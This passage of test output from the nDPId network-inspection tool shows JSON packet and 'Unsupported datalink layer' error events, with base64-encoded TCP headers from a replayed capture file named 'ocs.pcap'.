layer","datalink":12,"packet_id":712,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652829509} -00323{"packet_event_id":1,"packet_event_name":"packet","packet_id":712,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMMzQABABn+2wKi0ArL40DbC2QBQ64tGkd7y93uAEC\/qgj0AAAEBCAoANZNbRwYmbw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":713,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652829512} -00324{"packet_event_id":1,"packet_event_name":"packet","packet_id":713,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMM0QABABn+1wKi0ArL40DbC2QBQ64tGkd7y\/OeAEC\/WfOUAAAEBCAoANZNbRwYmbw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":714,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652829573} -00323{"packet_event_id":1,"packet_event_name":"packet","packet_id":714,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMM1QABABn+0wKi0ArL40DbC2QBQ64tGkd7zAlOAEC\/qd1UAAAEBCAoANZNhRwYmeQ=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":715,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652829578} -00340{"packet_event_id":1,"packet_event_name":"packet","packet_id":715,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMM2QABABn+nwKi0ArL40DbC2QBQ64tGkd7zAlOwEC\/qbmsAAAEBCAoANZNiRwYmeQEBBQre8we\/3vMNKw=="} 
-00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":716,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652829657} -00348{"packet_event_id":1,"packet_event_name":"packet","packet_id":716,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":72,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":72,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAASMM3QABABn+ewKi0ArL40DbC2QBQ64tGkd7zAlPQEC\/qUCEAAAEBCAoANZNqRwYmeQEBBRLe8x1v3vMi297zB7\/e8w0r"} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":717,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652829749} -00339{"packet_event_id":1,"packet_event_name":"packet","packet_id":717,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMM4QABABn+lwKi0ArL40DbC2QBQ64tGkd7zDSuwEC\/WOAsAAAEBCAoANZNyRwYmpQEBBQre8x1v3vMi2w=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":718,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652829828} -00339{"packet_event_id":1,"packet_event_name":"packet","packet_id":718,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMM5QABABn+kwKi0ArL40DbC2QBQ64tGkd7zEpewEC\/qMmwAAAEBCAoANZN7RwYmuwEBBQre8x1v3vMi2w=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":719,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652829873} 
-00340{"packet_event_id":1,"packet_event_name":"packet","packet_id":719,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMM6QABABn+jwKi0ArL40DbC2QBQ64tGkd7zEpewEC\/qLPwAAAEBCAoANZN\/RwYmuwEBBQre8x1v3vMoRw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":720,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652829921} -00339{"packet_event_id":1,"packet_event_name":"packet","packet_id":720,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMM7QABABn+iwKi0ArL40DbC2QBQ64tGkd7zGAOwEC\/WJ4AAAAEBCAoANZOERwYm2gEBBQre8x1v3vMoRw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":721,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652829922} -00323{"packet_event_id":1,"packet_event_name":"packet","packet_id":721,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMM8QABABn+twKi0ArL40DbC2QBQ64tGkd7zKEeAEC\/WUPEAAAEBCAoANZOERwYm2g=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":722,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652829961} -00323{"packet_event_id":1,"packet_event_name":"packet","packet_id":722,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMM9QABABn+swKi0ArL40DbC2QBQ64tGkd7zLbOAEC\/qS2EAAAEBCAoANZOIRwYm5g=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink 
layer","datalink":12,"packet_id":723,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652829962} -00323{"packet_event_id":1,"packet_event_name":"packet","packet_id":723,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMM+QABABn+rwKi0ArL40DbC2QBQ64tGkd7zMx+AEC\/qRfUAAAEBCAoANZOIRwYm5g=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":724,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652829963} -00324{"packet_event_id":1,"packet_event_name":"packet","packet_id":724,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMM\/QABABn+qwKi0ArL40DbC2QBQ64tGkd7zOIuAEC\/WQJ0AAAEBCAoANZOIRwYm5g=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":725,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652829990} -00323{"packet_event_id":1,"packet_event_name":"packet","packet_id":725,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMNAQABABn+pwKi0ArL40DbC2QBQ64tGkd7zPfeAEC\/qOxAAAAEBCAoANZOLRwYm8A=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":726,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652829991} -00323{"packet_event_id":1,"packet_event_name":"packet","packet_id":726,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMNBQABABn+owKi0ArL40DbC2QBQ64tGkd7zQ2OAEC\/qNaQAAAEBCAoANZOLRwYm8A=="} 
-00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":727,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652829991} -00323{"packet_event_id":1,"packet_event_name":"packet","packet_id":727,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMNCQABABn+nwKi0ArL40DbC2QBQ64tGkd7zSM+AEC\/WMEwAAAEBCAoANZOLRwYm8A=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":728,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652830025} -00323{"packet_event_id":1,"packet_event_name":"packet","packet_id":728,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMNDQABABn+mwKi0ArL40DbC2QBQ64tGkd7zTjuAEC\/qKr8AAAEBCAoANZOPRwYm+Q=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":729,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652830027} -00323{"packet_event_id":1,"packet_event_name":"packet","packet_id":729,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMNEQABABn+lwKi0ArL40DbC2QBQ64tGkd7zU6eAEC\/qJVMAAAEBCAoANZOPRwYm+Q=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":730,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652830028} 
-00324{"packet_event_id":1,"packet_event_name":"packet","packet_id":730,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMNFQABABn+kwKi0ArL40DbC2QBQ64tGkd7zWROAEC\/WH\/sAAAEBCAoANZOPRwYm+Q=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":731,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652830030} -00323{"packet_event_id":1,"packet_event_name":"packet","packet_id":731,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMNGQABABn+jwKi0ArL40DbC2QBQ64tGkd7zXn+AEC\/qGnsAAAEBCAoANZOPRwYm+Q=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":732,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652830031} -00323{"packet_event_id":1,"packet_event_name":"packet","packet_id":732,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMNHQABABn+iwKi0ArL40DbC2QBQ64tGkd7zY+uAEC\/WFSMAAAEBCAoANZOPRwYm+Q=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":733,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652830100} -00323{"packet_event_id":1,"packet_event_name":"packet","packet_id":733,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMNIQABABn+hwKi0ArL40DbC2QBQ64tGkd7zaVeAEC\/qD5UAAAEBCAoANZOWRwYnAA=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink 
layer","datalink":12,"packet_id":734,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652830102} -00339{"packet_event_id":1,"packet_event_name":"packet","packet_id":734,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMNJQABABn+UwKi0ArL40DbC2QBQ64tGkd7zaVewEC\/qOKMAAAEBCAoANZOWRwYnAAEBBQre827D3vN0Lw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":735,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652830112} -00348{"packet_event_id":1,"packet_event_name":"packet","packet_id":735,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":72,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":72,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAASMNKQABABn+LwKi0ArL40DbC2QBQ64tGkd7zaVfQEC\/qYgcAAAEBCAoANZOXRwYnAAEBBRLe83mb3vN\/B97zbsPe83Qv"} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":736,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652830190} -00347{"packet_event_id":1,"packet_event_name":"packet","packet_id":736,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":72,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":72,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAASMNLQABABn+KwKi0ArL40DbC2QBQ64tGkd7zaVfQEC\/qXJMAAAEBCAoANZOfRwYnAAEBBRLe83mb3vOEc97zbsPe83Qv"} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":737,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652830453} 
-00339{"packet_event_id":1,"packet_event_name":"packet","packet_id":737,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMNMQABABn+RwKi0ArL40DbC2QBQ64tGkd7zdC+wEC\/BEl4AAAEBCAoANZO5RwYnVwEBBQre83mb3vOEcw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":738,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652830495} -00348{"packet_event_id":1,"packet_event_name":"packet","packet_id":738,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":72,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":72,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAASMNNQABABn+IwKi0ArL40DbC2QBQ64tGkd7zdC\/QEC\/BGzcAAAEBCAoANZO9RwYnVwEBBRLe84nf3vOPS97zeZve84Rz"} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":739,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652830497} -00348{"packet_event_id":1,"packet_event_name":"packet","packet_id":739,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":72,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":72,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAASMNOQABABn+HwKi0ArL40DbC2QBQ64tGkd7zdC\/QEC\/BFcoAAAEBCAoANZO+RwYnVwEBBRLe84nf3vOUt97zeZve84Rz"} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":740,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652830577} -00339{"packet_event_id":1,"packet_event_name":"packet","packet_id":740,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMNPQABABn+OwKi0ArL40DbC2QBQ64tGkd7zdC+wEC\/BAg0AAAEBCAoANZPGRwYnVwEBBQre83mb3vOUtw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink 
layer","datalink":12,"packet_id":741,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652830579} -00348{"packet_event_id":1,"packet_event_name":"packet","packet_id":741,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":72,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":72,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAASMNQQABABn+FwKi0ArL40DbC2QBQ64tGkd7zdC\/QEC\/BABIAAAEBCAoANZPGRwYnVwEBBRLe849L3vOUt97zeZve85S3"} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":742,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652830863} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":742,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMNRQABABn+YwKi0ArL40DbC2QBQ64tGkd7zlLeAEC+X44IAAAEBCAoANZPiRwYnuQ=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":743,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652830932} -00323{"packet_event_id":1,"packet_event_name":"packet","packet_id":743,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMNSQABABn+XwKi0ArL40DbC2QBQ64tGkd7zmiOAEC\/q3aEAAAEBCAoANZPpRwYn1A=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":744,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652831004} -00339{"packet_event_id":1,"packet_event_name":"packet","packet_id":744,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMNTQABABn+KwKi0ArL40DbC2QBQ64tGkd7zmiOwEC\/qpRAAAAEBCAoANZPwRwYn1AEBBQre85+P3vOk+w=="} 
-00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":745,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652831005} -00339{"packet_event_id":1,"packet_event_name":"packet","packet_id":745,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMNUQABABn+JwKi0ArL40DbC2QBQ64tGkd7zmiOwEC\/qn6QAAAEBCAoANZPwRwYn1AEBBQre85+P3vOqZw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":746,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652831056} -00339{"packet_event_id":1,"packet_event_name":"packet","packet_id":746,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMNVQABABn+IwKi0ArL40DbC2QBQ64tGkd7zmiOwEC\/qmjIAAAEBCAoANZP2RwYn1AEBBQre85+P3vOv0w=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":747,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652831068} -00339{"packet_event_id":1,"packet_event_name":"packet","packet_id":747,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMNWQABABn+HwKi0ArL40DbC2QBQ64tGkd7zmiOwEC\/qlMUAAAEBCAoANZP3RwYn1AEBBQre85+P3vO1Pw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":748,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652831110} 
-00339{"packet_event_id":1,"packet_event_name":"packet","packet_id":748,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMNXQABABn+GwKi0ArL40DbC2QBQ64tGkd7zmiOwEC\/qj1UAAAEBCAoANZP7RwYn1AEBBQre85+P3vO6qw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":749,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652831118} -00339{"packet_event_id":1,"packet_event_name":"packet","packet_id":749,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMNYQABABn+FwKi0ArL40DbC2QBQ64tGkd7zmiOwEC\/qiegAAAEBCAoANZP8RwYn1AEBBQre85+P3vPAFw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":750,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652831173} -00339{"packet_event_id":1,"packet_event_name":"packet","packet_id":750,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMNZQABABn+EwKi0ArL40DbC2QBQ64tGkd7zmiOwEC\/qhHcAAAEBCAoANZQBRwYn1AEBBQre85+P3vPFgw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":751,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652831201} -00339{"packet_event_id":1,"packet_event_name":"packet","packet_id":751,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMNaQABABn+DwKi0ArL40DbC2QBQ64tGkd7zmiOwEC\/qfwgAAAEBCAoANZQERwYn1AEBBQre85+P3vPK7w=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink 
layer","datalink":12,"packet_id":752,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652831261} -00348{"packet_event_id":1,"packet_event_name":"packet","packet_id":752,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":72,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":72,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAASMNbQABABn96wKi0ArL40DbC2QBQ64tGkd7zmiPQEC\/q+uYAAAEBCAoANZQKRwYn1AEBBRLe89Bb3vPVx97zn4\/e88rv"} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":753,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652831282} -00338{"packet_event_id":1,"packet_event_name":"packet","packet_id":753,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMNcQABABn+BwKi0ArL40DbC2QBQ64tGkd7zyu+wEC9CEuEAAAEBCAoANZQMRwYoKwEBBQre89Bb3vPVxw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":754,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652831373} -00339{"packet_event_id":1,"packet_event_name":"packet","packet_id":754,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMNdQABABn+AwKi0ArL40DbC2QBQ64tGkd7zyu+wEC\/WDNgAAAEBCAoANZQVRwYoKwEBBQre89Bb3vPbMw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":755,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652831451} 
-00340{"packet_event_id":1,"packet_event_name":"packet","packet_id":755,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMNeQABABn9\/wKi0ArL40DbC2QBQ64tGkd7zyu+wEC\/WB2QAAAEBCAoANZQdRwYoKwEBBQre89Bb3vPgnw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":756,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652831508} -00339{"packet_event_id":1,"packet_event_name":"packet","packet_id":756,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMNfQABABn9+wKi0ArL40DbC2QBQ64tGkd7zyu+wEC\/WAfIAAAEBCAoANZQjRwYoKwEBBQre89Bb3vPmCw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":757,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652831595} -00340{"packet_event_id":1,"packet_event_name":"packet","packet_id":757,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMNgQABABn99wKi0ArL40DbC2QBQ64tGkd7zyu+wEC\/W\/HwAAAEBCAoANZQsRwYoKwEBBQre89Bb3vPrdw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":758,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652831619} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":758,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMNhQABABn+IwKi0ArL40DbC2QBQ64tGkd7z63eAEC+Xi7AAAAEBCAoANZQuRwYofw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink 
